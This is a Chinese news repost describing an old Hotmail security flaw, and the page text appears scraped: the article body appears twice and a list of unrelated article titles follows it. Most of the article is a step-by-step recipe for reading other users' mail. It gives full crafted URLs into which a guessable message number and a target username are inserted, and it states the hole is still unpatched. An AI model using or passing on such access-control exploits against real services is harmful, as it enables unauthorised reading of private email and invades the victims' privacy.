Hotmail发现严重安全漏洞
来源:互联网 发布:最短路径路由算法 编辑:程序博客网 时间:2024/04/27 01:53
近日,一位Hotmail用户发现,通过简单的更改地址中的邮件编号等信
息就可以浏览它人的邮件内容。由于邮件编号都有一定的规则,所以很容
易猜出来。要完成此项工作,你必须拥有2个Hotmail信箱。
用于偷看他人邮件的地址为:
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd? _lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%
2fgetmsg&hm___qs=%26msg%3dMSGXXXXXXXXX% 2e(X)X%26start%3d1% 26len%3d99999999999%26login%
3dUSERNAME%26domain%3dhotmail%2ecom
其中XXXXXXXXX为邮件编号,USERNAME为用户账号,(X)X为介于0和59
之间的第二编码。
比如说,你有一个名为r00tarded@hotmail.com的信箱。首先登录此信
箱,打开任何一封邮件,此时地址栏中的地址将是:
http://lw2fd.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a=5691b2b4e104176111971aa0fbb1274&msg=MSG998000947.3&start=197078&len=1060&msgread=1&mfs=182
这封电子邮件的编号就是MSG998000947.3。把地址拷贝下来,注销。
然后登录另一个信箱。把刚才的那封邮件的编号和账号插入地址栏:
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998000947%2e3%26start%3d1%26len%3d99999999999%26login%
3dr00tarded%26domain%3dhotmail%2ecom
回车。看到什么了?对,r00tarded@hotmail.com中的那封邮件的内容
。
提请广大Hotmail用户注意,此漏洞到本站发稿时为止仍未修复。(张
永刚)
(责编:Cathy)
息就可以浏览它人的邮件内容。由于邮件编号都有一定的规则,所以很容
易猜出来。要完成此项工作,你必须拥有2个Hotmail信箱。
用于偷看他人邮件的地址为:
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd? _lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%
2fgetmsg&hm___qs=%26msg%3dMSGXXXXXXXXX% 2e(X)X%26start%3d1% 26len%3d99999999999%26login%
3dUSERNAME%26domain%3dhotmail%2ecom
其中XXXXXXXXX为邮件编号,USERNAME为用户账号,(X)X为介于0和59
之间的第二编码。
比如说,你有一个名为r00tarded@hotmail.com的信箱。首先登录此信
箱,打开任何一封邮件,此时地址栏中的地址将是:
http://lw2fd.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a=5691b2b4e104176111971aa0fbb1274&msg=MSG998000947.3&start=197078&len=1060&msgread=1&mfs=182
这封电子邮件的编号就是MSG998000947.3。把地址拷贝下来,注销。
然后登录另一个信箱。把刚才的那封邮件的编号和账号插入地址栏:
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998000947%2e3%26start%3d1%26len%3d99999999999%26login%
3dr00tarded%26domain%3dhotmail%2ecom
回车。看到什么了?对,r00tarded@hotmail.com中的那封邮件的内容
。
提请广大Hotmail用户注意,此漏洞到本站发稿时为止仍未修复。(张
永刚)
(责编:Cathy)
- Hotmail发现严重安全漏洞
- RealVNC 4.1发现严重安全漏洞
- RealVNC 4.1发现严重安全漏洞
- RealVNC 4.1发现严重安全漏洞
- RealVNC 4.1发现严重安全漏洞
- RealVNC 4.1发现严重安全漏洞
- RealVNC 4.1发现严重安全漏洞
- RealVNC 4.1发现严重安全漏洞
- 微软IIS被发现一个严重安全漏洞
- 微软 asp.net所有版本被发现严重安全漏洞2416728
- 120941138.三星处理器被发现存在严重安全漏洞
- Phpwind出现严重安全漏洞
- OpenSSL严重安全漏洞CCS
- 小米手机电商主站严重安全漏洞
- Apache Tomcat全系再曝严重安全漏洞
- USB接口爆发严重安全漏洞
- 发现hotmail的一个bug
- 数学家发现 Gmail 安全漏洞
- 如何在VC 下定制多媒体真彩封页
- 我还是喜欢 C/C++!!!
- Java学习笔记-准备阶段
- 疯狂赛扬:普通Celeron633也超950
- 液晶显示器,不能不说的六大暗伤
- Hotmail发现严重安全漏洞
- 新浪电子邮箱为何瘫痪?
- 光驱新技术透视
- 关于AC’97标准的几个观点
- 硬盘容量与性能如何取舍?
- MS Flex Grid控件的使用
- MS Flex Grid控件的使用(续一)
- MS Flex Grid控件的使用(续二)
- 通用的控件之间的拖放方法(Drag and Drop)